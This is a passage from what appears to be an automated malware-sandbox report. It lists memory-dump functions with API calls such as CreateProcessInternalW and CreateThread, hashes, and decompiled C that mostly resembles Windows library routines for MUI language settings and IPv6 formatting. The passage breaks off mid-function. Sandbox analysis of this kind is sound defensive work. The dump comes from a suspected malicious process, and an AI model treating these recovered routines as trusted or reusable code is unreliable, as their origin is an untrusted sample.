                                                • Opcode Fuzzy Hash: eb98dd3dfbfccd50391a5d0e174e4a5484c44bf3fdb2df05183759b85b31f33b
                                                • Instruction Fuzzy Hash: CE01A731A9122877E724A6949C43FFE776C6F51F50F094114FF04BA1C1EBD4690546F6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0012A734
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction ID: f9e986440ae8ce675604b72ed862e44a7311548cd55955a6d30ec1fc1a015c0e
                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                • Instruction Fuzzy Hash: A201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001291A4, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011F050,?,?,00000000), ref: 001291EC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                                                • Instruction ID: 9eb21ae964b034d94d6095e26d970be2f2970a3f6637451d1c83b0119969f49b
                                                • Opcode Fuzzy Hash: 90f4d560c854e61cb04fff5511f6c9e31f58e75d6f69431325777fef47646c46
                                                • Instruction Fuzzy Hash: A5F02E762443513FD7315A686C47FEBBB649F51B20F150169F549DB1C3D794E4124390
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001291B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011F050,?,?,00000000), ref: 001291EC
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                • Instruction ID: 20e70ed5779541b1cf66b9e5118323c45a78919f8daed13dcedabaac9eb49940
                                                • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                                • Instruction Fuzzy Hash: B8E06D373803143AE3206599BC02FA7B29C9B91B20F15003AFA0DEA2C1DA95F81142A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A7C2, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011F1D2,0011F1D2,?,00000000,?,?), ref: 0012A800
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                                                • Instruction ID: 0d2a0776f47a4cf9e537762d2714ce19fb0515e64ee8a28f9c2613fa497fdff6
                                                • Opcode Fuzzy Hash: 74acd7c4576bd7b0bd9d9c9a66c28c11f4d177fc94782425aa7f78d02a80c1ec
                                                • Instruction Fuzzy Hash: 06F0E5B2600218ABDB14DF54CC40ED73768EF45310F258154FD086B242C631ED15CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011F1D2,0011F1D2,?,00000000,?,?), ref: 0012A800
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction ID: 6c4b6c94b272d6314400b91d8520528279f4fba4984a800c52b3dad936c0bc71
                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                • Instruction Fuzzy Hash: E8E01AB12002186BDB10DF59DC85EEB37ADEF88650F118154BA0857241CA34E8108BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0011F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,00118D14,?), ref: 0011F6FB
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Offset: 00110000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction ID: c87e15c6548643cd66f1d5f12375eead61c029e4affb50fd2c6c1102a298b109
                                                • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                • Instruction Fuzzy Hash: 3CD05E616503082BE610AAA4AC13F6632886B54B00F4A0074F948962C3EA54E4018565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 02538788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E02538788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02538460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0251E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0253718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02538460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0253718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02538460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02538460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02538460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0253718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0251E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02512340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0252E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0251E2A8(_t322,  &_v68, _v16);
								if(E02535553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0252E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0251E2A8(_t322,  &_v68, _t236);
								if(E02535553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0253718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0251E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02512340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0252E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0251E2A8(_v12,  &_v68, _v16);
							if(E02535553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0252E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0251E2A8(_t322,  &_v68, _t269);
							if(E02535553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0253718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0251E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02512340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0252E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0251E2A8(_v12,  &_v68, _v16);
						if(E02535553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0252E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0251E2A8(_t322,  &_v68, _t296);
						if(E02535553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0251E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                0x02538788
                                                0x02538788
                                                0x02538791
                                                0x02538794
                                                0x02538798
                                                0x0253879b
                                                0x0253879e
                                                0x025387a1
                                                0x025387a4
                                                0x025387a7
                                                0x025387aa
                                                0x025387af
                                                0x02581ad3
                                                0x02538b0a
                                                0x02538b0d
                                                0x02538b13
                                                0x02538b19
                                                0x02538b1f
                                                0x02538b25
                                                0x02538b2b
                                                0x02538b31
                                                0x02538b37
                                                0x02538b3d
                                                0x02538b46
                                                0x02538b46
                                                0x025387c6
                                                0x025387d0
                                                0x02581ae0
                                                0x02581ae6
                                                0x02581af8
                                                0x02581af8
                                                0x02581afd
                                                0x02581afe
                                                0x02581b01
                                                0x02581b06
                                                0x02581b06
                                                0x025387d6
                                                0x025387f2
                                                0x025387f7
                                                0x02538807
                                                0x0253880a
                                                0x0253880f
                                                0x02538810
                                                0x02538813
                                                0x02538818
                                                0x02538818
                                                0x0253882c
                                                0x02538831
                                                0x02538838
                                                0x02538908
                                                0x02538920
                                                0x025389f0
                                                0x02538a08
                                                0x02538af6
                                                0x02538af6
                                                0x02538af8
                                                0x02538afb
                                                0x02581beb
                                                0x02581beb
                                                0x02538b04
                                                0x02581bf8
                                                0x02581c0e
                                                0x02581c13
                                                0x02581c16
                                                0x02581c16
                                                0x02581bf8
                                                0x00000000
                                                0x02538b04
                                                0x02538a0e
                                                0x02538a11
                                                0x02538a14
                                                0x02538a15
                                                0x02538a18
                                                0x02538a22
                                                0x02538b59
                                                0x02538a28
                                                0x02538a3c
                                                0x02538a3c
                                                0x02538a42
                                                0x02581bb0
                                                0x02581b11
                                                0x02581b11
                                                0x00000000
                                                0x02538a48
                                                0x02538a51
                                                0x02538a5b
                                                0x02538a5e
                                                0x02538a61
                                                0x02538a69
                                                0x02538a69
                                                0x02538a6d
                                                0x00000000
                                                0x00000000
                                                0x02538a74
                                                0x02538a7c
                                                0x02538a7d
                                                0x02538a91
                                                0x02538a93
                                                0x02538a93
                                                0x02538a98
                                                0x02538a9b
                                                0x02538aa1
                                                0x02538aa1
                                                0x02538aa4
                                                0x02538aaa
                                                0x02538ab1
                                                0x02538ac5
                                                0x02538ac7
                                                0x02538ac7
                                                0x02538ac5
                                                0x02538ace
                                                0x02581bc9
                                                0x02581bce
                                                0x02581bd2
                                                0x02581bd2
                                                0x02538ad8
                                                0x02538aeb
                                                0x02538aeb
                                                0x02538af0
                                                0x02538af4
                                                0x00000000
                                                0x02538af4
                                                0x02538a42
                                                0x02538926
                                                0x02538929
                                                0x0253892c
                                                0x0253892d
                                                0x02538930
                                                0x02538935
                                                0x0253893a
                                                0x02538b51
                                                0x02538940
                                                0x02538954
                                                0x02538954
                                                0x0253895a
                                                0x02581b63
                                                0x00000000
                                                0x02538960
                                                0x02538969
                                                0x02538973
                                                0x02538976
                                                0x02538979
                                                0x0253897e
                                                0x02538981
                                                0x02538981
                                                0x02538986
                                                0x00000000
                                                0x00000000
                                                0x02581b6e
                                                0x02581b74
                                                0x02581b7b
                                                0x02581b8f
                                                0x02581b91
                                                0x02581b91
                                                0x02581b99
                                                0x02581b9c
                                                0x02581ba2
                                                0x02581ba2
                                                0x0253898c
                                                0x02538992
                                                0x02538999
                                                0x025389ad
                                                0x02581ba8
                                                0x02581ba8
                                                0x025389ad
                                                0x025389b6
                                                0x025389c8
                                                0x025389cd
                                                0x025389d0
                                                0x025389d0
                                                0x025389d6
                                                0x025389e8
                                                0x025389e8
                                                0x025389ed
                                                0x00000000
                                                0x025389ed
                                                0x0253895a
                                                0x0253883e
                                                0x02538841
                                                0x02538844
                                                0x02538845
                                                0x02538848
                                                0x0253884d
                                                0x02538852
                                                0x02538b49
                                                0x02538858
                                                0x0253886c
                                                0x0253886c
                                                0x02538872
                                                0x02581b0e
                                                0x00000000
                                                0x02538878
                                                0x02538881
                                                0x0253888b
                                                0x0253888e
                                                0x02538891
                                                0x02538896
                                                0x02538899
                                                0x02538899
                                                0x0253889e
                                                0x00000000
                                                0x00000000
                                                0x02581b21
                                                0x02581b27
                                                0x02581b2e
                                                0x02581b42
                                                0x02581b44
                                                0x02581b44
                                                0x02581b4c
                                                0x02581b4f
                                                0x02581b55
                                                0x02581b55
                                                0x025388a4
                                                0x025388aa
                                                0x025388b1
                                                0x025388c5
                                                0x02581b5b
                                                0x02581b5b
                                                0x025388c5
                                                0x025388ce
                                                0x025388e0
                                                0x025388e5
                                                0x025388e8
                                                0x025388e8
                                                0x025388ee
                                                0x02538900
                                                0x02538900
                                                0x02538905
                                                0x00000000
                                                0x02538905

                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 025389FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 025387E6
                                                • Kernel-MUI-Language-Disallowed, xrefs: 02538914
                                                • Kernel-MUI-Language-Allowed, xrefs: 02538827
                                                • WindowsExcludedProcs, xrefs: 025387C1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                • Opcode ID: 50933e3a0b94120737382bfd28f31e630bfa7dbd2e42858df537284ae5035f64
                                                • Instruction ID: 16b69dc605866405db4b20a1f336b8dd0b91993e9b7cdf8f5832d3aef68eeaf0
                                                • Opcode Fuzzy Hash: 50933e3a0b94120737382bfd28f31e630bfa7dbd2e42858df537284ae5035f64
                                                • Instruction Fuzzy Hash: A2F11AB2D0020AEFDF16EF94C984AEEBBB9FF48304F14546AE505A7210E735AA45CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 025513CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 38%
                                                			E025513CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02547707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2512926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02547707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2519cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02547707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02547707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02547707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02547707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                0x025513d5
                                                0x025513d9
                                                0x025513dc
                                                0x025513de
                                                0x025513e1
                                                0x025513e8
                                                0x025513ee
                                                0x0257e8fd
                                                0x00000000
                                                0x0257e921
                                                0x0257e921
                                                0x0257e928
                                                0x0257e982
                                                0x0257e98a
                                                0x00000000
                                                0x0257e99a
                                                0x0257e99e
                                                0x0257e9a3
                                                0x0257e9a8
                                                0x0257e9b9
                                                0x0257e978
                                                0x00000000
                                                0x0257e978
                                                0x0257e98a
                                                0x0257e92a
                                                0x0257e931
                                                0x0257e944
                                                0x0257e944
                                                0x0257e950
                                                0x0257e954
                                                0x0257e959
                                                0x0257e95e
                                                0x0257e963
                                                0x0257e970
                                                0x00000000
                                                0x0257e975
                                                0x0257e93b
                                                0x0257e980
                                                0x00000000
                                                0x0257e980
                                                0x0257e942
                                                0x0257e94b
                                                0x00000000
                                                0x0257e94b
                                                0x00000000
                                                0x0257e942
                                                0x025513f4
                                                0x025513f4
                                                0x025513f9
                                                0x025513fc
                                                0x025513ff
                                                0x02551406
                                                0x0257e9cc
                                                0x0257e9d2
                                                0x0257e9d2
                                                0x0257e9cc
                                                0x0255140c
                                                0x02551411
                                                0x02551431
                                                0x0255143a
                                                0x0255143c
                                                0x0255143f
                                                0x0255143f
                                                0x02551442
                                                0x02551447
                                                0x025514a8
                                                0x025514ac
                                                0x0257e9e2
                                                0x0257e9e7
                                                0x0257e9ec
                                                0x0257ea05
                                                0x0257ea05
                                                0x00000000
                                                0x02551449
                                                0x00000000
                                                0x02551449
                                                0x0255144c
                                                0x02551459
                                                0x02551462
                                                0x02551469
                                                0x0255146a
                                                0x02551470
                                                0x02551473
                                                0x02551476
                                                0x02551476
                                                0x02551490
                                                0x02551495
                                                0x0255138e
                                                0x02551390
                                                0x02551397
                                                0x02551398
                                                0x02551399
                                                0x025513a1
                                                0x025513a4
                                                0x025513a4
                                                0x02551498
                                                0x0255149c
                                                0x0255149f
                                                0x025514a2
                                                0x00000000
                                                0x00000000
                                                0x025514a4
                                                0x00000000
                                                0x025514a4
                                                0x02551413
                                                0x02551415
                                                0x02551416
                                                0x02551419
                                                0x0255141c
                                                0x02551422
                                                0x025513b7
                                                0x025513bc
                                                0x025513bf
                                                0x025513bf
                                                0x025513c2
                                                0x02551424
                                                0x02551424
                                                0x02551424
                                                0x02551427
                                                0x0255142b
                                                0x0255142c
                                                0x0255142c
                                                0x0255142c
                                                0x00000000
                                                0x0255141c
                                                0x02551411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 45b8c1c9b8a6c1d495776cbe7497e27d0baa9bfff7adad2591a4920029b0cecb
                                                • Instruction ID: 1411232c99e4e314d5f9d29afd6e69e3ce63fab4318e85f0a0e3c849c026cbe6
                                                • Opcode Fuzzy Hash: 45b8c1c9b8a6c1d495776cbe7497e27d0baa9bfff7adad2591a4920029b0cecb
                                                • Instruction Fuzzy Hash: 2A612871D00A65EADF24DF59C8A0ABFBFB5FF84304B54C46EE89A47540D734A640CB68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02547EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E02547EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x25f2088; // 0x76505f1a
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
